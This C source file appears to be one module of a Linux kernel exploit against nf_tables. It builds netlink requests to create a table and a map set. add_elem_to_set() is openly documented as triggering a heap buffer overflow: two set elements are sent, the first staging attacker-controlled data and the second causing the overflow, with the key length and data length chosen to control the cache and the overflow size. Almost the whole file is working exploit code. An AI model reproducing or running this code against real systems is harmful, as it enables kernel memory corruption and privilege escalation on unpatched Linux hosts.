#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#include "log.h"
#include "netlink.h"
#include "nf_tables.h"

/* Fallback for headers that do not define NFTA_SET_ELEM_KEY_END. */
#ifndef NFTA_SET_ELEM_KEY_END
#define NFTA_SET_ELEM_KEY_END (10)
#endif

/*
 * 0x40 zero bytes. add_elem_to_set() passes this buffer as the payload of
 * every element key and key-end attribute it builds.
 */
const uint8_t zerobuf[0x40] = {0};

/**
 * create_table(): Register a new table for the inet family
 * @sock: socket bound to the netfilter netlink
 * @name: Name of the new table
 *
 * Builds an NFT_MSG_NEWTABLE request carrying a single NFTA_TABLE_NAME
 * attribute and sends it, wrapped between a batch-begin and a batch-end
 * message, in one sendmsg() call. die() is called if the allocation or the
 * send fails. The three message buffers are freed before returning.
 */
void create_table(int sock, const char *name) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct iovec iov[3];
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh;
    struct nlmsghdr *nlh_batch_end;
    struct nlattr *attr;
    struct nfgenmsg *nfm;

    /* Destination preparation */
    memset(&dest_snl, 0, sizeof(dest_snl));
    dest_snl.nl_family = AF_NETLINK;
    memset(&msg, 0, sizeof(msg));

    /* Netlink batch_begin message preparation */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Netlink table message preparation */
    nlh = malloc(TABLEMSG_SIZE);
    if (!nlh) {
        die("malloc: %m");
    }

    memset(nlh, 0, TABLEMSG_SIZE);
    nlh->nlmsg_len = TABLEMSG_SIZE;
    nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWTABLE;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = NLM_F_REQUEST;
    nlh->nlmsg_seq = 0;

    nfm = NLMSG_DATA(nlh);
    nfm->nfgen_family = NFPROTO_INET;

    /** Prepare associated attribute **/
    /* The first attribute sits right after the aligned nfgenmsg header. */
    attr = (struct nlattr *)((char *)nlh + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    set_str8_attr(attr, NFTA_TABLE_NAME, name);

    /* Netlink batch_end message preparation */
    nlh_batch_end = get_batch_end_nlmsg();

    /* IOV preparation: batch_begin, payload, batch_end, in that order */
    memset(iov, 0, sizeof(iov));
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh;
    iov[1].iov_len = nlh->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Message header preparation */
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = sizeof(iov) / sizeof(iov[0]);

    /* A failed send was previously ignored; report it like malloc failure. */
    if (sendmsg(sock, &msg, 0) < 0) {
        die("sendmsg: %m");
    }

    /* Free used structures */
    free(nlh_batch_end);
    free(nlh);
    free(nlh_batch_begin);
}

/**
 * create_set(): Create a netfilter set
 * @sock: Socket used to communicate through the netfilter netlink
 * @set_name: Name of the created set
 * @set_keylen: Length of the keys of this set. Used in the exploit to control the used cache
 * @data_len: Length of stored data. Used to control the size of the overflow
 * @table_name: Name of the table that stores this set
 * @id: ID of the created set
 *
 * Builds an NFT_MSG_NEWSET request (flags NLM_F_REQUEST | NLM_F_CREATE) for
 * the inet family with the NFT_SET_MAP flag and a data type of 0, and sends it
 * wrapped between a batch-begin and a batch-end message in one sendmsg() call.
 * die() is called if the allocation or the send fails. The three message
 * buffers are freed before returning.
 */
void create_set(int sock, const char *set_name, uint32_t set_keylen, uint32_t data_len, const char *table_name, uint32_t id) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch_begin */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */
    /* The size accounting below must list the same attributes that are written further down. */
    nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_TABLE
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_NAME
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_ID
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_KEY_LEN
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_FLAGS
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_TYPE
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_DATA_LEN
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = malloc(nlh_payload_size);
    if (!nlh_payload) {
        die("malloc: %m");
    }

    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSET;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    nlh_payload->nlmsg_seq = 0;

    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    /** Setup the attributes */
    /* The first attribute sits right after the aligned nfgenmsg header. */
    attr = (struct nlattr *)((char *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_NAME, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ID, id);
    attr = set_u32_attr(attr, NFTA_SET_KEY_LEN, set_keylen);
    attr = set_u32_attr(attr, NFTA_SET_FLAGS, NFT_SET_MAP);
    attr = set_u32_attr(attr, NFTA_SET_DATA_TYPE, 0);
    set_u32_attr(attr, NFTA_SET_DATA_LEN, data_len);

    /* Last netlink message: batch_end */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec: batch_begin, payload, batch_end, in that order */
    memset(iov, 0, sizeof(iov));
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = sizeof(iov) / sizeof(iov[0]);

    /* Send message; a failed send was previously ignored, report it like malloc failure. */
    if (sendmsg(sock, &msg, 0) < 0) {
        die("sendmsg: %m");
    }

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}

/**
 * add_elem_to_set(): Trigger the heap buffer overflow
 * @sock: Socket used to communicate through the netfilter netlink
 * @set_name: Name of the set to add the element
 * @set_keylen: Length of the keys of the previous set
 * @table_name: Table associated to the previous set
 * @id: ID of the previous set
 * @data_len: Length of the data to copy. (= Size of the overflow - 16 )
 * @data: Data used for the overflow
 *
 * Submit two elements to add to the set.
 * The first one is used to setup the data payload
 * The second will trigger the overflow
 *
 * Both elements are carried by a single NFT_MSG_NEWSETELEM request, sent
 * between a batch-begin and a batch-end message in one sendmsg() call.
 * die() is called if the allocation or the send fails. The three message
 * buffers are freed before returning.
 *
 * NOTE(review): the key and key-end payloads are taken from zerobuf, which is
 * 0x40 bytes long; presumably set_binary_attr() reads set_keylen bytes from
 * it, so set_keylen is assumed to be <= 0x40 - confirm against the helper.
 */
void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name,
                     uint32_t id, uint32_t data_len, uint8_t *data) {
    struct msghdr msg;
    struct sockaddr_nl dest_snl;
    struct nlmsghdr *nlh_batch_begin;
    struct nlmsghdr *nlh_payload;
    struct nlmsghdr *nlh_batch_end;
    struct nfgenmsg *nfm;
    struct nlattr *attr;
    uint64_t nlh_payload_size;
    uint64_t nested_attr_size;
    size_t first_element_size;
    size_t second_element_size;
    struct iovec iov[3];

    /* Prepare the netlink sockaddr for msg */
    memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
    dest_snl.nl_family = AF_NETLINK;

    /* First netlink message: batch */
    nlh_batch_begin = get_batch_begin_nlmsg();

    /* Second netlink message : Set attributes */

    /** Precompute the size of the nested field **/
    /*
     * The accounting below must list the same attributes, in the same order,
     * as the writes further down.
     * NOTE(review): the key sizes are not wrapped in NLA_ALIGN() while the
     * data size is; this looks like it assumes set_keylen is a multiple of
     * the netlink attribute alignment - confirm against the helper macros.
     */
    nested_attr_size = 0;

    /*** First element ***/
    nested_attr_size += sizeof(struct nlattr);             // Englobing attribute
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_KEY
    nested_attr_size += NLA_BIN_SIZE(set_keylen);          // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_KEY_END
    nested_attr_size += NLA_BIN_SIZE(set_keylen);          // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);             // NFTA_SET_ELEM_DATA
    nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len)); // NFTA_DATA_VALUE
    first_element_size = nested_attr_size;

    /*** Second element ***/
    nested_attr_size += sizeof(struct nlattr);    // Englobing attribute
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_KEY
    nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_KEY_END
    nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
    nested_attr_size += sizeof(struct nlattr);    // NFTA_SET_ELEM_DATA
    nested_attr_size += sizeof(struct nlattr);    // NFTA_DATA_VERDICT
    nested_attr_size += U32_NLA_SIZE;             // NFTA_VERDICT_CODE
    second_element_size = nested_attr_size - first_element_size;

    nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
    nlh_payload_size += sizeof(struct nlattr);  // NFTA_SET_ELEM_LIST_ELEMENTS
    nlh_payload_size += nested_attr_size;       // All the stuff described above
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_ELEM_LIST_TABLE
    nlh_payload_size += S8_NLA_SIZE;            // NFTA_SET_ELEM_LIST_SET
    nlh_payload_size += U32_NLA_SIZE;           // NFTA_SET_ELEM_LIST_SET_ID
    nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

    /** Allocation **/
    nlh_payload = malloc(nlh_payload_size);
    if (!nlh_payload) {
        die("malloc: %m");
    }
    memset(nlh_payload, 0, nlh_payload_size);

    /** Fill the required fields **/
    nlh_payload->nlmsg_len = nlh_payload_size;
    nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
    nlh_payload->nlmsg_pid = getpid();
    nlh_payload->nlmsg_flags = NLM_F_REQUEST;
    nlh_payload->nlmsg_seq = 0;

    /** Setup the nfgenmsg **/
    nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
    nfm->nfgen_family = NFPROTO_INET;

    /** Setup the attributes */
    /* The first attribute sits right after the aligned nfgenmsg header. */
    attr = (struct nlattr *)((char *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
    attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
    attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);

    /*** First element ***/
    /* The element sizes include the englobing attribute header, so it is subtracted here. */
    attr = set_nested_attr(attr, 0, first_element_size - sizeof(struct nlattr));
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY_END, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);

    /*** Second element ***/
    attr = set_nested_attr(attr, 0, second_element_size - sizeof(struct nlattr));
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY_END, NLA_BIN_SIZE(set_keylen));
    attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
    attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
    attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
    attr = set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

    /* Last netlink message: End of batch */
    nlh_batch_end = get_batch_end_nlmsg();

    /* Setup the iovec: batch_begin, payload, batch_end, in that order */
    memset(iov, 0, sizeof(iov));
    iov[0].iov_base = (void *)nlh_batch_begin;
    iov[0].iov_len = nlh_batch_begin->nlmsg_len;
    iov[1].iov_base = (void *)nlh_payload;
    iov[1].iov_len = nlh_payload->nlmsg_len;
    iov[2].iov_base = (void *)nlh_batch_end;
    iov[2].iov_len = nlh_batch_end->nlmsg_len;

    /* Prepare the message to send */
    memset(&msg, 0, sizeof(struct msghdr));
    msg.msg_name = (void *)&dest_snl;
    msg.msg_namelen = sizeof(struct sockaddr_nl);
    msg.msg_iov = iov;
    msg.msg_iovlen = sizeof(iov) / sizeof(iov[0]);

    /* Send message; a failed send was previously ignored, report it like malloc failure. */
    if (sendmsg(sock, &msg, 0) < 0) {
        die("sendmsg: %m");
    }

    /* Free allocated memory */
    free(nlh_batch_end);
    free(nlh_payload);
    free(nlh_batch_begin);
}
